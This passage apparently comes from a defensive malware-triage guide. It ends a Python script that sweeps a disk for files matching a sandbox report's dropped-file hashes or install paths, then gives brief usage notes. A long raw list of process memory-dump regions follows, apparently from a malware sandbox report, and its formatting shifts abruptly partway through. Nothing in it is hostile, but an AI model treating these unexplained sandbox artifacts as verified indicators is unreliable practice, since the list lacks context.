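    """Last n path components, case-folded, accepting Windows or POSIX separators."""
    parts = [p for p in re.split(r"[\\/]+", path) if p]
    return tuple(p.lower() for p in parts[-n:])


def sweep(root: str, iocs: List[DroppedFile]) -> List[Tuple[str, str, DroppedFile]]:
    """Walk root and return (file, reason, ioc): 'hash' for an exact SHA256 match,
    'location' for a file at the same parent-dir\\name as a dropped file (weaker: a
    rebuilt sample changes its hashes but tends to keep its install path)."""
    by_sha256 = {i.sha256: i for i in iocs}
    by_tail = {location_tail(i.path): i for i in iocs if i.path}
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                digests = hash_file(full)
            except OSError:
                continue  # unreadable or vanished; a production sweep would log this
            if digests["sha256"] in by_sha256:
                hits.append((full, "hash", by_sha256[digests["sha256"]]))
            elif location_tail(full) in by_tail:
                hits.append((full, "location", by_tail[location_tail(full)]))
    return hits


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else os.getcwd()
    for file_path, reason, ioc in sweep(root, parse_dropped_files(SAMPLE_REPORT)):
        print(f"{reason:8} {file_path} -> {ioc.path} ({ioc.sha256[:12]}...)")
```

Run it as `python sweep.py C:\Users` (or any mount of the suspect disk) after pasting the full dropped-files section of a report into SAMPLE_REPORT. A "location" hit is a lead, not a verdict: confirm it by hashing the file and comparing against the report, or by inspecting the file, before acting on it.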

• memory/1984-706-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-664-0x0000022F5CFD0000-0x0000022F5D0DA000-memory.dmp
  Filesize: 1.0MB

• memory/1984-3468-0x0000022F44650000-0x0000022F446A4000-memory.dmp
  Filesize: 336KB

• memory/1984-3466-0x0000022F44600000-0x0000022F4464C000-memory.dmp
  Filesize: 304KB

• memory/1984-3465-0x0000022F44590000-0x0000022F445E6000-memory.dmp
  Filesize: 344KB

• memory/1984-667-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-674-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-686-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-702-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-668-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-670-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-672-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-676-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-694-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-678-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-681-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-682-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-692-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-663-0x0000022F428E0000-0x0000022F42988000-memory.dmp
  Filesize: 672KB

• memory/1984-684-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-689-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-709-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-704-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-714-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-712-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-718-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-716-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-710-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-690-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-700-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-698-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/1984-696-0x0000022F5CFD0000-0x0000022F5D0D7000-memory.dmp
  Filesize: 1.0MB

• memory/2024-635-0x000002562CE40000-0x000002562CE62000-memory.dmp
  Filesize: 136KB

• memory/2172-3470-0x0000000000FC0000-0x000000000147A000-memory.dmp
  Filesize: 4.7MB

• memory/2172-30267-0x0000000000640000-0x0000000000AEC000-memory.dmp
  Filesize: 4.7MB

• memory/2172-32509-0x0000000000640000-0x0000000000AEC000-memory.dmp
  Filesize: 4.7MB

• memory/2172-30274-0x0000000008BF0000-0x0000000008BFA000-memory.dmp
  Filesize: 40KB

• memory/2172-30272-0x0000000000640000-0x0000000000AEC000-memory.dmp
  Filesize: 4.7MB

• memory/2172-3467-0x0000000000FC0000-0x000000000147A000-memory.dmp
  Filesize: 4.7MB

• memory/2172-30271-0x0000000000640000-0x0000000000AEC000-memory.dmp
  Filesize: 4.7MB

• memory/2540-36183-0x0000000000400000-0x000000000040E000-memory.dmp
  Filesize: 56KB

• memory/3196-34-0x0000000000230000-0x00000000006EA000-memory.dmp
  Filesize: 4.7MB

• memory/3196-47-0x0000000000230000-0x00000000006EA000-memory.dmp
  Filesize: 4.7MB

• memory/3212-30262-0x00000000086C0000-0x00000000086D2000-memory.dmp
  Filesize: 72KB

• memory/3212-30270-0x0000000000190000-0x000000000063C000-memory.dmp
  Filesize: 4.7MB

• memory/3212-30263-0x0000000008C20000-0x0000000008C5C000-memory.dmp
  Filesize: 240KB

• memory/3212-30257-0x0000000000190000-0x000000000063C000-memory.dmp
  Filesize: 4.7MB

• memory/3212-30260-0x0000000007940000-0x00000000079D2000-memory.dmp
  Filesize: 584KB

• memory/3212-30259-0x0000000000190000-0x000000000063C000-memory.dmp
  Filesize: 4.7MB

• memory/3212-30258-0x0000000000190000-0x000000000063C000-memory.dmp
  Filesize: 4.7MB

• memory/3444-63-0x0000000000400000-0x000000000085E000-memory.dmp
  Filesize: 4.4MB

• memory/3444-137-0x0000000000400000-0x000000000085E000-memory.dmp
  Filesize: 4.4MB

• memory/3444-2623-0x0000000000400000-0x000000000085E000-memory.dmp
  Filesize: 4.4MB

• memory/3444-647-0x0000000000400000-0x000000000085E000-memory.dmp
  Filesize: 4.4MB

• memory/3444-204-0x0000000000400000-0x000000000085E000-memory.dmp
  Filesize: 4.4MB

• memory/3556-17-0x00000000062A0000-0x00000000062BE000-memory.dmp
  Filesize: 120KB

• memory/3556-18-0x00000000062F0000-0x000000000633C000-memory.dmp
  Filesize: 304KB

• memory/3556-2-0x0000000004D10000-0x0000000004D46000-memory.dmp
  Filesize: 216KB

• memory/3556-4-0x0000000005410000-0x0000000005432000-memory.dmp
  Filesize: 136KB

• memory/3556-16-0x0000000005DF0000-0x0000000006144000-memory.dmp
  Filesize: 3.3MB

• memory/3556-6-0x0000000005C80000-0x0000000005CE6000-memory.dmp
  Filesize: 408KB

• memory/3556-20-0x00000000067F0000-0x000000000680A000-memory.dmp
  Filesize: 104KB

• memory/3556-5-0x0000000005B20000-0x0000000005B86000-memory.dmp
  Filesize: 408KB

• memory/3556-22-0x0000000007820000-0x00000000078B6000-memory.dmp
  Filesize: 600KB

• memory/3556-3-0x0000000005480000-0x0000000005AA8000-memory.dmp
  Filesize: 6.2MB

• memory/3556-23-0x00000000077B0000-0x00000000077D2000-memory.dmp
  Filesize: 136KB

• memory/3556-24-0x0000000008630000-0x0000000008BD4000-memory.dmp
  Filesize: 5.6MB

• memory/3556-19-0x0000000007A00000-0x000000000807A000-memory.dmp
  Filesize: 6.5MB

• memory/4396-36245-0x0000000005600000-0x0000000005954000-memory.dmp
  Filesize: 3.3MB

• memory/4396-36250-0x0000000005AC0000-0x0000000005B0C000-memory.dmp
  Filesize: 304KB

• memory/4396-36677-0x0000000006F70000-0x0000000006FC6000-memory.dmp
  Filesize: 344KB

• memory/4396-36676-0x0000000009900000-0x0000000009D96000-memory.dmp
  Filesize: 4.6MB

• memory/4520-154-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB

• memory/4520-155-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB

• memory/5732-665-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB

• memory/5732-666-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB

• memory/6024-648-0x0000000000FC0000-0x000000000147A000-memory.dmp
  Filesize: 4.7MB

• memory/6024-48-0x0000000000FC0000-0x000000000147A000-memory.dmp
  Filesize: 4.7MB

• memory/6024-64-0x0000000000FC0000-0x000000000147A000-memory.dmp
  Filesize: 4.7MB

• memory/6024-71-0x0000000000FC0000-0x000000000147A000-memory.dmp
  Filesize: 4.7MB

• memory/6024-159-0x0000000000FC0000-0x000000000147A000-memory.dmp
  Filesize: 4.7MB

• memory/6024-379-0x0000000000FC0000-0x000000000147A000-memory.dmp
  Filesize: 4.7MB

• memory/7240-32526-0x0000000000980000-0x000000000140E000-memory.dmp
  Filesize: 10.6MB

• memory/7240-32510-0x0000000000980000-0x000000000140E000-memory.dmp
  Filesize: 10.6MB

• memory/8272-33302-0x0000000005260000-0x0000000005270000-memory.dmp
  Filesize: 64KB

• memory/8272-36153-0x0000000009EA0000-0x0000000009EF2000-memory.dmp
  Filesize: 328KB

• memory/8272-36185-0x000000006EEF0000-0x000000006F4D0000-memory.dmp
  Filesize: 5.9MB

• memory/8272-35380-0x000000006EEF0000-0x000000006F4D0000-memory.dmp
  Filesize: 5.9MB

• memory/8272-33250-0x00000000008E0000-0x0000000000ECC000-memory.dmp
  Filesize: 5.9MB

• memory/8272-33265-0x000000006EEF0000-0x000000006F4D0000-memory.dmp
  Filesize: 5.9MB

• memory/8272-33294-0x0000000008EA0000-0x0000000008F3C000-memory.dmp

                                              Filesize

                                              624KB

                                            • memory/8272-33295-0x0000000009340000-0x00000000093AA000-memory.dmp

                                              Filesize

                                              424KB

                                            • memory/9544-36170-0x000002414B2E0000-0x000002414B2F8000-memory.dmp

                                              Filesize

                                              96KB

                                            • memory/11920-36211-0x0000000007CA0000-0x0000000007CAA000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/11920-36216-0x0000000007F50000-0x0000000007F58000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/11920-36209-0x0000000007880000-0x000000000789E000-memory.dmp

                                              Filesize

                                              120KB

                                            • memory/11920-36212-0x0000000007E30000-0x0000000007E41000-memory.dmp

                                              Filesize

                                              68KB

                                            • memory/11920-36213-0x0000000007E60000-0x0000000007E6E000-memory.dmp

                                              Filesize

                                              56KB

                                            • memory/11920-36214-0x0000000007E70000-0x0000000007E84000-memory.dmp

                                              Filesize

                                              80KB

                                            • memory/11920-36215-0x0000000007F70000-0x0000000007F8A000-memory.dmp

                                              Filesize

                                              104KB

                                            • memory/11920-36210-0x0000000007AF0000-0x0000000007B93000-memory.dmp

                                              Filesize

                                              652KB

                                            • memory/11920-36195-0x0000000006570000-0x00000000068C4000-memory.dmp

                                              Filesize

                                              3.3MB

                                            • memory/11920-36196-0x0000000006950000-0x000000000699C000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/11920-36198-0x00000000078A0000-0x00000000078D2000-memory.dmp

                                              Filesize

                                              200KB

                                            • memory/11920-36199-0x000000006EE60000-0x000000006EEAC000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/12796-36225-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB

                                            • memory/12796-36223-0x0000000000FC0000-0x000000000147A000-memory.dmp

                                              Filesize

                                              4.7MB